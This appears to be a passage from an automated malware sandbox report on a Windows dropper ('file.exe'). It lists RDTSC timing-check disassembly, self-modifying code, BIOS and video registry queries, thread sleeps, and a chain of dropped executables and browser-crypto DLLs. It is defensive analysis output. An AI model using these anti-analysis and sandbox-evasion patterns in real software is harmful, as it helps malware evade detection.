                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4860299 second address: 48602E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD7ED12076Fh 0x00000009 xor eax, 4A8B9C5Eh 0x0000000f jmp 00007FD7ED120779h 0x00000014 popfd 0x00000015 mov ah, 85h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FD7ED12076Fh 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48602E3 second address: 486030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 0B7Ah 0x00000007 movsx edx, ax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD7ECCCADF9h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486030E second address: 486032F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120771h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, dx 0x00000011 movsx ebx, si 0x00000014 popad 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486032F second address: 486034C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b mov edx, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 486034C second address: 4860350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48805D8 second address: 48805ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADF1h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48805ED second address: 48805FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop esi 0x0000000e mov bl, 5Bh 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48805FE second address: 488060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADEAh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506C3 second address: 48506C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506C7 second address: 48506CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506CB second address: 48506D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506D1 second address: 48506E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ED120771h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506E6 second address: 48506EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48506EA second address: 4850734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 533FD098h 0x0000000f jmp 00007FD7ED12076Dh 0x00000014 mov eax, dword ptr fs:[00000000h] 0x0000001a jmp 00007FD7ED12076Eh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FD7ED120777h 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850734 second address: 4850760 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD7ECCCADECh 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850760 second address: 4850766 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4850766 second address: 485076A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 485076A second address: 48507A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d mov bx, ax 0x00000010 push eax 0x00000011 pop esi 0x00000012 popad 0x00000013 sub esp, 1Ch 0x00000016 jmp 00007FD7ED120771h 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 48507A0 second address: 48507A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BEC1F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 262829 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: BEC5A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 2EACA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 75EC1F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 902829 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 75EC5A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: 98ACA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Special instruction interceptor: First address: A2FE77 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Special instruction interceptor: First address: A2FDFD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Special instruction interceptor: First address: BD281B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Special instruction interceptor: First address: BE3A9A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Special instruction interceptor: First address: C6BFA9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Special instruction interceptor: First address: 9D8D32 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Special instruction interceptor: First address: 81CB87 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Special instruction interceptor: First address: 9C0C48 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Special instruction interceptor: First address: A3BDE4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Special instruction interceptor: First address: C37A1D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Special instruction interceptor: First address: C37973 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Special instruction interceptor: First address: DD1EFB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Special instruction interceptor: First address: DE0E2A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Special instruction interceptor: First address: 42FC44 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Special instruction interceptor: First address: 5D0ACB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Special instruction interceptor: First address: 5D06E4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Special instruction interceptor: First address: 656FD7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe	Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe	Memory allocated: 2B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe	Memory allocated: 2910000 memory reserve | memory write watch
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Memory allocated: 220D5060000 memory reserve | memory write watch
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Memory allocated: 220ED230000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_048A0CCD rdtsc 0_2_048A0CCD
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Thread delayed: delay time: 922337203685477
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Thread delayed: delay time: 922337203685477
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2128
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 3406
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window / User API: threadDelayed 2901
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe	Window / User API: threadDelayed 2232
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe	Window / User API: threadDelayed 7584
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3255
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2876
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4936
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2034
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7060
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1598
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Window / User API: threadDelayed 1176
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Window / User API: threadDelayed 1217
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Window / User API: threadDelayed 1168
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Window / User API: threadDelayed 1196
Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe	Window / User API: threadDelayed 1191
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Window / User API: threadDelayed 911
Source: C:\pnpyqs\5119130eb96345a8a13dc770d0f33571.exe	Window / User API: threadDelayed 356
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Window / User API: threadDelayed 807
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Window / User API: threadDelayed 749
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Window / User API: threadDelayed 863
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Window / User API: threadDelayed 821
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Window / User API: threadDelayed 3271
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Window / User API: threadDelayed 837
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Bunifu_UI_v1.5.3.dll
Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\975RDI33VTLWGIQACCE.exe
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1v1w92NeCw3SKGKedet\Y-Cleaner.exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[5].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019039001\d7884c562e.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019040001\73c096c84a.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019038001\fcd2b0e3cd.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019037001\9905c00c72.exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019034001\ce29828af5.exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019036001\164919d456.exe
Source: C:\Users\user\AppData\Local\Temp\1019030001\0577f55121.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]
Source: C:\Users\user\AppData\Local\Temp\1019027001\9bc5ebea0e.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019035001\964c9facda.exe
Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[4].exe
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	API coverage: 5.2 %
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep count: 87 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8064	Thread sleep time: -174087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068	Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8068	Thread sleep time: -210105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8012	Thread sleep count: 264 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8012	Thread sleep time: -7920000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8056	Thread sleep count: 2128 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8056	Thread sleep time: -4258128s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8060	Thread sleep count: 3406 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8060	Thread sleep time: -6815406s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep count: 106 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8080	Thread sleep time: -212106s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052	Thread sleep count: 2901 > 30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8052	Thread sleep time: -5804901s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -34126476536362649s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99868s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99762s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99655s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99544s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99313s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -99094s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98960s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98844s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98719s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98281s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -98063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97952s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97842s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97733s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97375s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97256s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -97092s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96899s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96794s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96672s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96563s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96453s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96225s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -96110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95860s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95735s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95610s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -95125s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94985s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94759s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94702s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94589s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94431s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019028001\4268204ace.exe TID: 7380	Thread sleep time: -94322s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800	Thread sleep count: 8087 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep count: 1633 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5224	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2252	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3352	Thread sleep count: 7060 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 412	Thread sleep count: 1598 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784	Thread sleep time: -3689348814741908s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1284Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\1019029001\9c2981f3e5.exe TID: 4612Thread sleep count: 1176 > 30
